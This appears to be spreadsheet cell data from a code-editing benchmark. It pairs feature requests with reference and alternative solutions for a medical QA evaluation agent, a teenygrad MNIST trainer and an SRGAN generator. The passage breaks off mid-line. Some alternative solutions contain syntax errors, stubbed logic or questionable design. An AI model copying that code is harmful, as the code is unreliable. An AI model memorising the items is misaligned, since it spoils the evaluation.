    <t>{'#file 1': 'def from_buffer(self, buf, detect_encoding=False):\n    """\n    Identify the contents of `buf`\n    """\n    with self.lock:\n        try:\n            # if we\'re on python3, convert buf to bytes\n            # otherwise this string is passed as wchar*\n            # which is not what libmagic expects\n            # NEXTBREAK: only take bytes\n            if type(buf) == str and str != bytes:\n                buf = buf.encode(\'utf-8\', errors=\'replace\')\n            result = maybe_decode(magic_buffer(self.cookie, buf))\n            if detect_encoding:\n                encoding = maybe_decode(magic_buffer(self.cookie, buf, flags=MAGIC_MIME_ENCODING))\n                return result, encoding\n            return result\n        except MagicException as e:\n            return self._handle509Bug(e)', '#file 2': "def test_detect_from_content(self):\n        # differ from upstream by opening file in binary mode,\n        # this avoids hitting a bug in python3+libfile bindings\n        # see https://github.com/ahupp/python-magic/issues/152\n        # for a similar issue\n        with open(self.filename, 'rb') as fobj:\n            result, encoding = magic.detect_from_content(fobj.read(4096), detect_encoding=True)\n        self.assert_result(result)\n        self.assertEqual(encoding, self.expected_encoding)  # New"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'class LLM_Agent:\n    def __init__(self, model_id = "mistralai/Mistral-7B-Instruct-v0.2", access_token = "Your HF Token here"):\n        ...\n    def evaluate(self):\n        eval_dataset = load_dataset("guan-wang/ReDis-QA")[\'test\']\n        ...\n        return acc_score', 'invoking_code_segment': 'def main():\n    parser = argparse.ArgumentParser(description=\'Zero Shot Experiment Script\')\n    parser.add_argument(\'--model_id\', type=str, default=\'google/gemma-1.1-7b-it\', help=\'ID of the model to use\')\n    parser.add_argument(\'--access_token\', type=str, help=\'Hugging Face access token\')\n    args = parser.parse_args()\n\n    agent = LLM_Agent(\n        model_id=args.model_id,\n        access_token=args.access_token\n    )\n\n    accuracy = agent.evaluate()\n    print(f"Evaluation completed with accuracy: {accuracy}")', 'feature_description': 'Add a feature to log the evaluation results to a database. This includes modifying the LLM_Agent class to support database logging with configurable database connection parameters, and updating the zero_shot_exp.py script to pass database configuration to the agent and handle database logging.', 'modified_complete_code': '# FILE 1: LLM_Agent.py\nimport os\nimport json\nimport torch\nimport numpy as np\nfrom transformers import AutoModelForCausalLM, AutoTokenizer\nimport argparse\nimport sys\nfrom datasets import load_dataset\nfrom sklearn.metrics import accuracy_score\nfrom tqdm import tqdm\n#New\nimport sqlite3\nfrom datetime import datetime\n\nclass LLM_Agent:\n    def __init__(self, model_id = "mistralai/Mistral-7B-Instruct-v0.2", access_token = "Your HF Token here", db_path=None):\n        self.model_id = model_id\n        tokenizer_id = model_id\n        self.tokenizer = AutoTokenizer.from_pretrained(tokenizer_id, token=access_token, trust_remote_code=True)\n        self.llm = AutoModelForCausalLM.from_pretrained(\n            model_id,\n            device_map="auto",\n            torch_dtype=torch.bfloat16,\n            attn_implementation="flash_attention_2",\n            token=access_token,\n            trust_remote_code=True\n        )\n        self.tokenizer.padding_side = "left"\n        self.A_ids = self.tokenizer("A").input_ids[-1]\n        self.B_ids = self.tokenizer("B").input_ids[-1]\n        self.C_ids = self.tokenizer("C").input_ids[-1]\n        self.D_ids = self.tokenizer("D").input_ids[-1]\n        self.system_prompt = "You are a helpful medical expert, and your task is to answer a multi-choice medical question. Please first choose the answer from the provided options and then provide the explanation."\n        #New\n        self.db_path = db_path\n        if self.db_path:\n            self._initialize_database()\n\n    #New\n    def _initialize_database(self):\n        """Initialize SQLite database for logging results."""\n        conn = sqlite3.connect(self.db_path)\n        cursor = conn.cursor()\n        cursor.execute(\'\'\'\n            CREATE TABLE IF NOT EXISTS evaluation_results (\n                id INTEGER PRIMARY KEY AUTOINCREMENT,\n                model_name TEXT NOT NULL,\n                dataset_name TEXT NOT NULL,\n                accuracy REAL NOT NULL,\n                timestamp DATETIME DEFAULT CURRENT_TIMESTAMP,\n                use_rag BOOLEAN DEFAULT 0\n            )\n        \'\'\')\n        conn.commit()\n        conn.close()\n\n    #New\n    def _log_to_database(self, results):\n        """Log evaluation results to database."""\n        if not self.db_path:\n            return\n        conn = sqlite3.connect(self.db_path)\n        cursor = conn.cursor()\n        cursor.execute(\'\'\'\n            INSERT INTO evaluation_results (model_name, dataset_name, accuracy, use_rag)\n            VALUES (?, ?, ?, ?)\n        \'\'\', (\n            results["model"],\n            results["dataset"],\n            results["accuracy"],\n            results["use_rag"]\n        ))\n        conn.commit()\n        conn.close()\n\n    @torch.no_grad()\n    def output_logit(self, input_text, **kwargs):\n        inputs = self.tokenizer(input_text, padding=False, return_tensors="pt")\n        input_ids = inputs.input_ids.cuda()\n        logits = self.llm(input_ids=input_ids).logits[:, -1].flatten()\n        probs = torch.nn.functional.softmax(\n            torch.tensor([\n                logits[self.A_ids],\n                logits[self.B_ids],\n                logits[self.C_ids],\n                logits[self.D_ids],\n            ]), dim=0)\n        return probs\n\n    def num_tokens(self, text):\n        encoding = self.tokenizer(text, padding=False, return_tensors="pt")\n        return encoding.input_ids.shape[-1]\n\n    def answermultiplechoice(self, question_doc):\n        if "gemma-1" in self.model_id.lower():\n            prompt = [{"role": "user", "content": question_doc["input"][:-7]}] + \\\n                 [{"role": "assistant", "content": "Answer: "}]\n            prompt_in_template = self.tokenizer.apply_chat_template(prompt, tokenize=False)[:-len("&lt;end_of_turn&gt;\\n")]\n        \n        elif "phi" in self.model_id.lower():\n            prompt = [{"role": "user", "content": question_doc["input"][:-7]}] + \\\n                    [{"role": "assistant", "content": "Answer: "}]\n            prompt_in_template = self.tokenizer.apply_chat_template(prompt, tokenize=False)[len("&lt;|endoftext|&gt;"):-len(f"&lt;|end|&gt;\\n&lt;|endoftext|&gt;\\n")]\n\n        elif "qwen" in self.model_id.lower():\n            prompt = [{"role": "user", "content": question_doc["input"][:-7]}] + \\\n                    [{"role": "assistant", "content": "Answer: "}]\n            prompt_in_template = self.tokenizer.apply_chat_template(prompt, tokenize=False)[:-len(f"&lt;|im_end|&gt;\\n")]\n\n        elif "llama-2" in self.model_id.lower(): \n            prompt = [{"role": "user", "content": question_doc["input"][:-7]}] + \\\n                    [{"role": "assistant", "content": "Answer: "}]\n            prompt_in_template = self.tokenizer.apply_chat_template(prompt, tokenize=False)[:-len(f"&lt;/s&gt;")]\n            \n        elif "mistral" in self.model_id.lower():\n            prompt = [{"role": "user", "content": question_doc["input"][:-7]}] + \\\n                    [{"role": "assistant", "content": "Answer: "}]\n            prompt_in_template = self.tokenizer.apply_chat_template(prompt, tokenize=False)[:-len("&lt;/s&gt;")]\n\n        probs = self.output_logit(prompt_in_template)\n        answer = int(probs.argmax(-1))\n        return answer, probs.detach().numpy()\n\n    #Modify\n    def evaluate(self):\n        eval_dataset = load_dataset("guan-wang/ReDis-QA")[\'test\']     \n        dataset_size = len(eval_dataset)\n        llm_ans_buf = []\n\n        for ques_idx in tqdm(range(dataset_size)):\n            question_doc = eval_dataset[ques_idx]\n            answer, probs = self.answermultiplechoice(question_doc)\n            llm_ans_buf.append(answer)\n\n        acc_score = accuracy_score(eval_dataset["cop"], llm_ans_buf)\n        results = {\n            "model": self.llm.config.name_or_path,\n            "dataset": "ReDisQA",\n            "use_rag": False,\n            "accuracy": acc_score,\n            "pred_ans": llm_ans_buf,\n            "golden_ans": eval_dataset["cop"],\n        }\n\n        model_name = self.llm.config.name_or_path.replace("/", "-")\n        results_fname = f"./model_{model_name}_dataset_ReDisQA_withoutRAG.json"\n        \n        script_dir = os.path.dirname(os.path.abspath(__file__))\n        results_dir = os.path.join(script_dir, "..", "results")\n        if not os.path.exists(results_dir):\n            os.makedirs(results_dir)\n\n        results_path = os.path.join(results_dir, results_fname)\n        with open(results_path, "w") as f:\n            json.dump(results, f, indent=4)\n\n        #New\n        self._log_to_database(results)\n\n        return acc_score\n\n# FILE 2: zero_shot_exp.py\nimport argparse\nfrom LLM_Agent import LLM_Agent  \n\ndef main():\n    parser = argparse.ArgumentParser(description=\'Zero Shot Experiment Script\')\n    parser.add_argument(\'--model_id\', type=str, default=\'google/gemma-1.1-7b-it\', help=\'ID of the model to use\')\n    parser.add_argument(\'--access_token\', type=str, help=\'Hugging Face access token\')\n    #New\n    parser.add_argument(\'--db_path\', type=str, default=\'./evaluation_results.db\', help=\'Path to SQLite database for logging results\')\n    args = parser.parse_args()\n\n    #Modify\n    agent = LLM_Agent(\n        model_id=args.model_id,\n        access_token=args.access_token,\n        db_path=args.db_path\n    )\n\n    accuracy = agent.evaluate()\n    print(f"Evaluation completed with accuracy: {accuracy}")\n    #New\n    print(f"Results logged to database: {args.db_path}")\n\nif __name__ == "__main__":\n    main()'}</t>
  </si>
  <si>
    <t>{'LLM_Agent.py': '#Modify\nclass LLM_Agent:\n    def __init__(self, model_id = "mistralai/Mistral-7B-Instruct-v0.2", access_token = "Your HF Token here"):\n        self.model_id = model_id\n        tokenizer_id = model_id\n        self.tokenizer = AutoTokenizer.from_pretrained(tokenizer_id, token=access_token, trust_remote_code=True)\n        self.llm = AutoModelForCausalLM.from_pretrained(\n            model_id,\n            device_map="auto",\n            torch_dtype=torch.bfloat16,\n            attn_implementation="flash_attention_2",\n            token=access_token,\n            trust_remote_code=True\n        )\n        self.tokenizer.padding_side = "left"\n        self.A_ids = self.tokenizer("A").input_ids[-1]\n        self.B_ids = self.tokenizer("B").input_ids[-1]\n        self.C_ids = self.tokenizer("C").input_ids[-1]\n        self.D_ids = self.tokenizer("D").input_ids[-1]\n        self.system_prompt = "You are a helpful medical expert, and your task is to answer a multi-choice medical question. Please first choose the answer from the provided options and then provide the explanation."\n\n    @torch.no_grad()\n    def output_logit(self, input_text, **kwargs):\n        inputs = self.tokenizer(input_text, padding=False, return_tensors="pt")\n        input_ids = inputs.input_ids.cuda()\n        logits = self.llm(input_ids=input_ids).logits[:, -1].flatten()\n        probs = torch.nn.functional.softmax(\n            torch.tensor([\n                logits[self.A_ids],\n                logits[self.B_ids],\n                logits[self.C_ids],\n                logits[self.D_ids],\n            ]), dim=0)\n        return probs\n\n    def num_tokens(self, text):\n        encoding = self.tokenizer(text, padding=False, return_tensors="pt")\n        return encoding.input_ids.shape[-1]\n\n    def answermultiplechoice(self, question_doc):\n        if "gemma-1" in self.model_id.lower():\n            prompt = [{"role": "user", "content": question_doc["input"][:-7]}] + \n                 [{"role": "assistant", "content": "Answer: "}]\n            prompt_in_template = self.tokenizer.apply_chat_template(prompt, tokenize=False)[:-len("&lt;end_of_turn&gt;\\n")]\n        \n        elif "phi" in self.model_id.lower():\n            prompt = [{"role": "user", "content": question_doc["input"][:-7]}] + \n                    [{"role": "assistant", "content": "Answer: "}]\n            prompt_in_template = self.tokenizer.apply_chat_template(prompt, tokenize=False)[len("&lt;|endoftext|&gt;")-len(f"&lt;|end|&gt;\\n&lt;|endoftext|&gt;\\n")]\n\n        elif "qwen" in self.model_id.lower():\n            prompt = [{"role": "user", "content": question_doc["input"][:-7]}] + \n                    [{"role": "assistant", "content": "Answer: "}]\n            prompt_in_template = self.tokenizer.apply_chat_template(prompt, tokenize=False)[:-len(f"&lt;|im_end|&gt;\\n")]\n\n        elif "llama-2" in self.model_id.lower(): \n            prompt = [{"role": "user", "content": question_doc["input"][:-7]}] + \n                    [{"role": "assistant", "content": "Answer: "}]\n            prompt_in_template = self.tokenizer.apply_chat_template(prompt, tokenize=False)[:-len(f"&lt;/s&gt;")\n        \n        elif "mistral" in self.model_id.lower():\n            prompt = [{"role": "user", "content": question_doc["input"][:-7]}] + \n                    [{"role": "assistant", "content": "Answer: "}]\n            prompt_in_template = self.tokenizer.apply_chat_template(prompt, tokenize=False)[:-len("&lt;/s&gt;")\n\n        probs = self.output_logit(prompt_in_template)\n        answer = int(probs.argmax(-1))\n        return answer, probs.detach().numpy()\n\n    def evaluate(self):\n        eval_dataset = load_dataset("guan-wang/ReDis-QA")[\'test\']     \n        dataset_size = len(eval_dataset)\n        llm_ans_buf = []\n\n        for ques_idx in tqdm(range(dataset_size)):\n            question_doc = eval_dataset[ques_idx]\n            answer, probs = self.answermultiplechoice(question_doc)\n            llm_ans_buf.append(answer)\n\n        acc_score = accuracy_score(eval_dataset["cop"], llm_ans_buf)\n        results = {\n            "model": self.llm.config.name_or_path,\n            "dataset": "ReDisQA",\n            "use_rag": False,\n            "accuracy": acc_score,\n            "pred_ans": llm_ans_buf,\n            "golden_ans": eval_dataset["cop"],\n        }\n\n        model_name = self.llm.config.name_or_path.replace("/", "-")\n        results_fname = f"./model_{model_name}_dataset_ReDisQA_withoutRAG.json"\n        \n        # Construct the relative path to the results directory\n        script_dir = os.path.dirname(os.path.abspath(__file__))  # Directory of the current script\n        results_dir = os.path.join(script_dir, "..", "results")  # Going one level up to project root and then to results directory\n        if not os.path.exists(results_dir):\n            os.makedirs(results_dir)  # Create the results directory if it does not exist\n\n        results_path = os.path.join(results_dir, results_fname)\n        with open(results_path, "w") as f:\n            json.dump(results, f, indent=4)\n\n        # New: Log results to a database\n        self.log_to_database(results)\n\n        return acc_score\n\n    # New: Method to log results to a database\n    def log_to_database(self, results):\n        # Placeholder for database logging logic\n        print("Logging results to database:", results)', 'zero_shot_exp.py': '#Modify\ndef main():\n    parser = argparse.ArgumentParser(description=\'Zero Shot Experiment Script\')\n    parser.add_argument(\'--model_id\', type=str, default=\'google/gemma-1.1-7b-it\', help=\'ID of the model to use\')\n    parser.add_argument(\'--access_token\', type=str, help=\'Hugging Face access token\')\n    args = parser.parse_args()\n\n    agent = LLM_Agent(\n        model_id=args.model_id,\n        access_token=args.access_token\n    )\n\n    accuracy = agent.evaluate()\n    print(f"Evaluation completed with accuracy: {accuracy}")\n\nif __name__ == "__main__":\n    main()'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def train(model, X_train, Y_train, optim, steps, BS=128, lossfn=lambda out,y: out.sparse_categorical_crossentropy(y), transform=lambda x: x, target_transform=lambda x: x, noloss=False)', 'invoking_code_segment': 'train(model, X_train, Y_train, optimizer, steps=100)', 'feature_description': 'Add a learning rate scheduler to the training process that adjusts the learning rate during training based on a schedule function', 'modified_complete_code': '# File 1: teenygrad/mnist.py\n\n#!/usr/bin/env python3\nimport numpy as np\nfrom teenygrad import Tensor\nfrom tqdm import trange\nimport gzip, os\n\nfrom teenygrad.nn import optim\nfrom teenygrad.helpers import getenv\n\n# #New: Learning rate scheduler class\nclass LRScheduler:\n  def __init__(self, optimizer, schedule_fn):\n    self.optimizer = optimizer\n    self.schedule_fn = schedule_fn\n  \n  def step(self, step_num):\n    lr = self.schedule_fn(step_num)\n    for param_group in self.optimizer.param_groups:\n      param_group[\'lr\'] = lr\n\n# #New: Default exponential decay scheduler\ndef exponential_decay(initial_lr, decay_rate, decay_steps):\n  def schedule(step):\n    return initial_lr * (decay_rate ** (step / decay_steps))\n  return schedule\n\ndef train(model, X_train, Y_train, optim, steps, BS=128, lossfn=lambda out,y: out.sparse_categorical_crossentropy(y),\n        transform=lambda x: x, target_transform=lambda x: x, noloss=False, lr_scheduler=None):\n  # #Modify: Added lr_scheduler parameter\n  Tensor.training = True\n  losses, accuracies = [], []\n  for i in (t := trange(steps, disable=getenv(\'CI\', False))):\n    # #New: Update learning rate if scheduler is provided\n    if lr_scheduler is not None:\n      lr_scheduler.step(i)\n    \n    samp = np.random.randint(0, X_train.shape[0], size=(BS))\n    x = Tensor(transform(X_train[samp]), requires_grad=False)\n    y = Tensor(target_transform(Y_train[samp]))\n\n    # network\n    out = model.forward(x) if hasattr(model, \'forward\') else model(x)\n\n    loss = lossfn(out, y)\n    optim.zero_grad()\n    loss.backward()\n    if noloss: del loss\n    optim.step()\n\n    # printing\n    if not noloss:\n      cat = np.argmax(out.numpy(), axis=-1)\n      accuracy = (cat == y.numpy()).mean()\n\n      loss = loss.detach().numpy()\n      losses.append(loss)\n      accuracies.append(accuracy)\n      t.set_description("loss %.2f accuracy %.2f" % (loss, accuracy))\n  return [losses, accuracies]\n\ndef evaluate(model, X_test, Y_test, num_classes=None, BS=128, return_predict=False, transform=lambda x: x,\n             target_transform=lambda y: y):\n  Tensor.training = False\n  def numpy_eval(Y_test, num_classes):\n    Y_test_preds_out = np.zeros(list(Y_test.shape)+[num_classes])\n    for i in trange((len(Y_test)-1)//BS+1, disable=getenv(\'CI\', False)):\n      x = Tensor(transform(X_test[i*BS:(i+1)*BS]))\n      out = model.forward(x) if hasattr(model, \'forward\') else model(x)\n      Y_test_preds_out[i*BS:(i+1)*BS] = out.numpy()\n    Y_test_preds = np.argmax(Y_test_preds_out, axis=-1)\n    Y_test = target_transform(Y_test)\n    return (Y_test == Y_test_preds).mean(), Y_test_preds\n\n  if num_classes is None: num_classes = Y_test.max().astype(int)+1\n  acc, Y_test_pred = numpy_eval(Y_test, num_classes)\n  print("test set accuracy is %f" % acc)\n  return (acc, Y_test_pred) if return_predict else acc\n\ndef fetch_mnist():\n  parse = lambda file: np.frombuffer(gzip.open(file).read(), dtype=np.uint8).copy()\n  BASE = os.path.dirname(__file__)+"/extra/datasets"\n  X_train = parse(BASE+"/mnist/train-images-idx3-ubyte.gz")[0x10:].reshape((-1, 28*28)).astype(np.float32)\n  Y_train = parse(BASE+"/mnist/train-labels-idx1-ubyte.gz")[8:]\n  X_test = parse(BASE+"/mnist/t10k-images-idx3-ubyte.gz")[0x10:].reshape((-1, 28*28)).astype(np.float32)\n  Y_test = parse(BASE+"/mnist/t10k-labels-idx1-ubyte.gz")[8:]\n  return X_train, Y_train, X_test, Y_test\n\nX_train, Y_train, X_test, Y_test = fetch_mnist()\n\nclass TinyConvNet:\n  def __init__(self):\n    conv = 3\n    inter_chan, out_chan = 8, 16\n    self.c1 = Tensor.scaled_uniform(inter_chan,1,conv,conv)\n    self.c2 = Tensor.scaled_uniform(out_chan,inter_chan,conv,conv)\n    self.l1 = Tensor.scaled_uniform(out_chan*5*5, 10)\n\n  def forward(self, x:Tensor):\n    x = x.reshape(shape=(-1, 1, 28, 28))\n    x = x.conv2d(self.c1).relu().max_pool2d()\n    x = x.conv2d(self.c2).relu().max_pool2d()\n    x = x.reshape(shape=[x.shape[0], -1])\n    return x.dot(self.l1).log_softmax()\n\nif __name__ == "__main__":\n  np.random.seed(1337)\n  model = TinyConvNet()\n  optimizer = optim.Adam([model.c1, model.c2, model.l1], lr=0.001)\n  # #Modify: Create learning rate scheduler with exponential decay\n  lr_schedule = exponential_decay(initial_lr=0.001, decay_rate=0.95, decay_steps=20)\n  scheduler = LRScheduler(optimizer, lr_schedule)\n  # #Modify: Pass scheduler to train function\n  train(model, X_train, Y_train, optimizer, steps=100, lr_scheduler=scheduler)\n  assert evaluate(model, X_test, Y_test) &gt; 0.93'}</t>
  </si>
  <si>
    <t>{'file1': 'def train(model, X_train, Y_train, optim, steps, scheduler=None, BS=128, lossfn=lambda out,y: out.sparse_categorical_crossentropy(y), transform=lambda x: x, target_transform=lambda x: x, noloss=False): #Modify Tensor.training = True losses, accuracies = [], [] for i in (t := trange(steps, disable=getenv(\'CI\', False))): samp = np.random.randint(0, X_train.shape[0], size=(BS)) x = Tensor(transform(X_train[samp]), requires_grad=False) y = Tensor(target_transform(Y_train[samp])) out = model.forward(x) if hasattr(model, \'forward\') else model(x) loss = lossfn(out, y) optim.zero_grad() loss.backward() if noloss: del loss optim.step() if scheduler: scheduler(optim, i) #New if not noloss: cat = np.argmax(out.numpy(), axis=-1) accuracy = (cat == y.numpy()).mean() loss = loss.detach().numpy() losses.append(loss) accuracies.append(accuracy) t.set_description("loss %.2f accuracy %.2f" % (loss, accuracy)) return [losses, accuracies]', 'file2': 'if __name__ == "__main__": np.random.seed(1337) model = TinyConvNet() optimizer = optim.Adam([model.c1, model.c2, model.l1], lr=0.001) def lr_scheduler(optimizer, step): #New if step % 50 == 0 and step &gt; 0: for param_group in optimizer.param_groups: param_group[\'lr\'] *= 0.1 train(model, X_train, Y_train, optimizer, steps=100, scheduler=lr_scheduler) #Modify assert evaluate(model, X_test, Y_test) &gt; 0.93'}</t>
  </si>
  <si>
    <t>{'called_code_segment': "def sr_resnet(num_filters=64, num_res_blocks=16):\n    x_in = Input(shape=(None, None, 3))\n    x = Lambda(normalize_01)(x_in)\n    x = Conv2D(num_filters, kernel_size=9, padding='same')(x)\n    x = x_1 = PReLU(shared_axes=[1, 2])(x)\n    for _ in range(num_res_blocks):\n        x = res_block(x, num_filters)\n    x = Conv2D(num_filters, kernel_size=3, padding='same')(x)\n    x = BatchNormalization()(x)\n    x = Add()([x_1, x])\n    x = upsample(x, num_filters * 4)\n    x = upsample(x, num_filters * 4)\n    x = Conv2D(3, kernel_size=9, padding='same', activation='tanh')(x)\n    x = Lambda(denormalize_m11)(x)\n    return Model(x_in, x)", 'invoking_code_segment': 'self.vgg = srgan.vgg_22()\nelif content_loss == \'VGG54\':\n    self.vgg = srgan.vgg_54()\nelse:\n    raise ValueError("content_loss must be either \'VGG22\' or \'VGG54\'")\nself.content_loss = content_loss\nself.generator = generator\nself.discriminator = discriminator', 'feature_description': 'Add a feature to allow the generator to output an additional channel for depth estimation. The generator model will now output 4 channels (RGB + depth) instead of 3 channels (RGB only). The depth channel is estimated alongside the super-resolution task, enabling joint RGB and depth prediction.', 'modified_complete_code': '# File 1: super-resolution/model/srgan.py\n# Modified sr_resnet function to support depth estimation output\n\ndef sr_resnet(num_filters=64, num_res_blocks=16, output_depth=False):\n    x_in = Input(shape=(None, None, 3))\n    x = Lambda(normalize_01)(x_in)\n\n    x = Conv2D(num_filters, kernel_size=9, padding=\'same\')(x)\n    x = x_1 = PReLU(shared_axes=[1, 2])(x)\n\n    for _ in range(num_res_blocks):\n        x = res_block(x, num_filters)\n\n    x = Conv2D(num_filters, kernel_size=3, padding=\'same\')(x)\n    x = BatchNormalization()(x)\n    x = Add()([x_1, x])\n\n    x = upsample(x, num_filters * 4)\n    x = upsample(x, num_filters * 4)\n\n    # #Modify: Conditional output based on depth estimation flag\n    if output_depth:\n        # #New: RGB output branch\n        rgb_out = Conv2D(3, kernel_size=9, padding=\'same\', activation=\'tanh\')(x)\n        rgb_out = Lambda(denormalize_m11)(rgb_out)\n        \n        # #New: Depth estimation branch\n        depth_out = Conv2D(num_filters, kernel_size=3, padding=\'same\')(x)\n        depth_out = PReLU(shared_axes=[1, 2])(depth_out)\n        depth_out = Conv2D(1, kernel_size=9, padding=\'same\', activation=\'sigmoid\')(depth_out)\n        \n        # #New: Concatenate RGB and depth outputs\n        from tensorflow.python.keras.layers import Concatenate\n        output = Concatenate()([rgb_out, depth_out])\n        return Model(x_in, output)\n    else:\n        x = Conv2D(3, kernel_size=9, padding=\'same\', activation=\'tanh\')(x)\n        x = Lambda(denormalize_m11)(x)\n        return Model(x_in, x)\n\n\n# #New: Generator wrapper function supporting depth estimation\ndef sr_resnet_with_depth(num_filters=64, num_res_blocks=16):\n    return sr_resnet(num_filters=num_filters, num_res_blocks=num_res_blocks, output_depth=True)\n\n\ngenerator = sr_resnet\n# #New: Alternative generator with depth output\ngenerator_with_depth = sr_resnet_with_depth\n\n\n# File 2: super-resolution/train.py\n# Modified SrganTrainer to support depth estimation\n\nclass SrganTrainer:\n    def __init__(self,\n                 generator,\n                 discriminator,\n                 content_loss=\'VGG54\',\n                 learning_rate=PiecewiseConstantDecay(boundaries=[100000], values=[1e-4, 1e-5]),\n                 # #New: Add depth estimation flag\n                 use_depth_estimation=False):\n\n        if content_loss == \'VGG22\':\n            self.vgg = srgan.vgg_22()\n        elif content_loss == \'VGG54\':\n            self.vgg = srgan.vgg_54()\n        else:\n            raise ValueError("content_loss must be either \'VGG22\' or \'VGG54\'")\n\n        self.content_loss = content_loss\n        self.generator = generator\n        self.discriminator = discriminator\n        # #New: Store depth estimation flag\n        self.use_depth_estimation = use_depth_estimation\n        self.generator_optimizer = Adam(learning_rate=learning_rate)\n        self.discriminator_optimizer = Adam(learning_rate=learning_rate)\n\n        self.binary_cross_entropy = BinaryCrossentropy(from_logits=False)\n        self.mean_squared_error = MeanSquaredError()\n        # #New: Add mean absolute error for depth loss\n        self.mean_absolute_error = MeanAbsoluteError()\n\n    def train(self, train_dataset, steps=200000):\n        pls_metric = Mean()\n        dls_metric = Mean()\n        # #New: Add depth loss metric\n        depth_loss_metric = Mean()\n        step = 0\n\n        for lr, hr in train_dataset.take(steps):\n            step += 1\n\n            # #Modify: Updated train_step to handle depth loss\n            if self.use_depth_estimation:\n                pl, dl, depth_l = self.train_step(lr, hr)\n                depth_loss_metric(depth_l)\n            else:\n                pl, dl = self.train_step(lr, hr)\n\n            pls_metric(pl)\n            dls_metric(dl)\n\n            if step % 50 == 0:\n                if self.use_depth_estimation:\n                    print(f\'{step}/{steps}, perceptual loss = {pls_metric.result():.4f}, discriminator loss = {dls_metric.result():.4f}, depth loss = {depth_loss_metric.result():.4f}\')\n                    depth_loss_metric.reset_states()\n                else:\n                    print(f\'{step}/{steps}, perceptual loss = {pls_metric.result():.4f}, discriminator loss = {dls_metric.result():.4f}\')\n                pls_metric.reset_states()\n                dls_metric.reset_states()\n\n    @tf.function\n    def train_step(self, lr, hr):\n        with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:\n            lr = tf.cast(lr, tf.float32)\n            hr = tf.cast(hr, tf.float32)\n\n            sr = self.generator(lr, training=True)\n\n            # #Modify: Handle depth estimation output\n            if self.use_depth_estimation:\n                sr_rgb = sr[..., :3]\n                sr_depth = sr[..., 3:4]\n            else:\n                sr_rgb = sr\n\n            hr_output = self.discriminator(hr, training=True)\n            sr_output = self.discriminator(sr_rgb, training=True)\n\n            con_loss = self._content_loss(hr, sr_rgb)\n            gen_loss = self._generator_loss(sr_output)\n            perc_loss = con_loss + 0.001 * gen_loss\n            disc_loss = self._discriminator_loss(hr_output, sr_output)\n\n            # #New: Add depth loss if depth estimation is enabled\n            if self.use_depth_estimation:\n                depth_loss = self._depth_loss(sr_depth)\n                perc_loss = perc_loss + 0.1 * depth_loss\n\n        gradients_of_generator = gen_tape.gradient(perc_loss, self.generator.trainable_variables)\n        gradients_of_discriminator = disc_tape.gradient(disc_loss, self.discriminator.trainable_variables)\n\n        self.generator_optimizer.apply_gradients(zip(gradients_of_generator, self.generator.trainable_variables))\n        self.discriminator_optimizer.apply_gradients(zip(gradients_of_discriminator, self.discriminator.trainable_variables))\n\n        if self.use_depth_estimation:\n            return perc_loss, disc_loss, depth_loss\n        else:\n            return perc_loss, disc_loss\n\n    @tf.function\n    def _content_loss(self, hr, sr):\n        sr = preprocess_input(sr)\n        hr = preprocess_input(hr)\n        sr_features = self.vgg(sr) / 12.75\n        hr_features = self.vgg(hr) / 12.75\n        return self.mean_squared_error(hr_features, sr_features)\n\n    def _generator_loss(self, sr_out):\n        return self.binary_cross_entropy(tf.ones_like(sr_out), sr_out)\n\n    def _discriminator_loss(self, hr_out, sr_out):\n        hr_loss = self.binary_cross_entropy(tf.ones_like(hr_out), hr_out)\n        sr_loss = self.binary_cross_entropy(tf.zeros_like(sr_out), sr_out)\n        return hr_loss + sr_loss\n\n    # #New: Add depth loss function\n    def _depth_loss(self, sr_depth):\n        # Regularization loss to encourage smooth depth maps\n        return self.mean_absolute_error(tf.zeros_like(sr_depth), sr_depth)'}</t>
  </si>
  <si>
    <t>{'srgan.py': "#Modify\n\ndef sr_resnet(num_filters=64, num_res_blocks=16):\n    x_in = Input(shape=(None, None, 3))\n    x = Lambda(normalize_01)(x_in)\n\n    x = Conv2D(num_filters, kernel_size=9, padding='same')(x)\n    x = x_1 = PReLU(shared_axes=[1, 2])(x)\n\n    for _ in range(num_res_blocks):\n        x = res_block(x, num_filters)\n\n    x = Conv2D(num_filters, kernel_size=3, padding='same')(x)\n    x = BatchNormalization()(x)\n    x = Add()([x_1, x])\n\n    x = upsample(x, num_filters * 4)\n    x = upsample(x, num_filters * 4)\n\n    x = Conv2D(3, kernel_size=9, padding='same', activation='tanh')(x)\n    x = Lambda(denormalize_m11)(x)\n\n    #New\n    depth = Conv2D(1, kernel_size=3, padding='same', activation='sigmoid')(x)\n    x = Concatenate()([x, depth])\n\n    return Model(x_in, x)\n\n\ngenerator = sr_resnet", 'train.py': '#Modify\n\nclass SrganTrainer:\n    #\n    # TODO: model and optimizer checkpoints\n    #\n    def __init__(self,\n                 generator,\n                 discriminator,\n                 content_loss=\'VGG54\',\n                 learning_rate=PiecewiseConstantDecay(boundaries=[100000], values=[1e-4, 1e-5])):\n\n        if content_loss == \'VGG22\':\n            self.vgg = srgan.vgg_22()\n        elif content_loss == \'VGG54\':\n            self.vgg = srgan.vgg_54()\n        else:\n            raise ValueError("content_loss must be either \'VGG22\' or \'VGG54\'")\n\n        self.content_loss = content_loss\n        self.generator = generator\n        self.discriminator = discriminator\n        self.generator_optimizer = Adam(learning_rate=learning_rate)\n        self.discriminator_optimizer = Adam(learning_rate=learning_rate)\n\n        self.binary_cross_entropy = BinaryCrossentropy(from_logits=False)\n        self.mean_squared_error = MeanSquaredError()\n\n    @tf.function\n    def train_step(self, lr, hr):\n        with tf.GradientTape() as gen_tape, tf.GradientTape() as disc_tape:\n            lr = tf.cast(lr, tf.float32)\n            hr = tf.cast(hr, tf.float32)\n\n            sr = self.generator(lr, training=True)\n\n            #New\n            sr_image = sr[:, :, :, :3]\n            sr_depth = sr[:, :, :, 3:]\n\n            hr_output = self.discriminator(hr, training=True)\n            sr_output = self.discriminator(sr_image, training=True)\n\n            con_loss = self._content_loss(hr, sr_image)\n            gen_loss = self._generator_loss(sr_output)\n            perc_loss = con_loss + 0.001 * gen_loss\n            disc_loss = self._discriminator_loss(hr_output, sr_output)\n\n        gradients_of_generator = gen_tape.gradient(perc_loss, self.generator.trainable_variables)\n        gradients_of_discriminator = disc_tape.gradient(disc_loss, self.discriminator.trainable_variables)\n\n        self.generator_optimizer.apply_gradients(zip(gradients_of_generator, self.generator.trainable_variables))\n        self.discriminator_optimizer.apply_gradients(zip(gradients_of_discriminator, self.discriminator.trainable_variables))\n\n        return perc_loss, 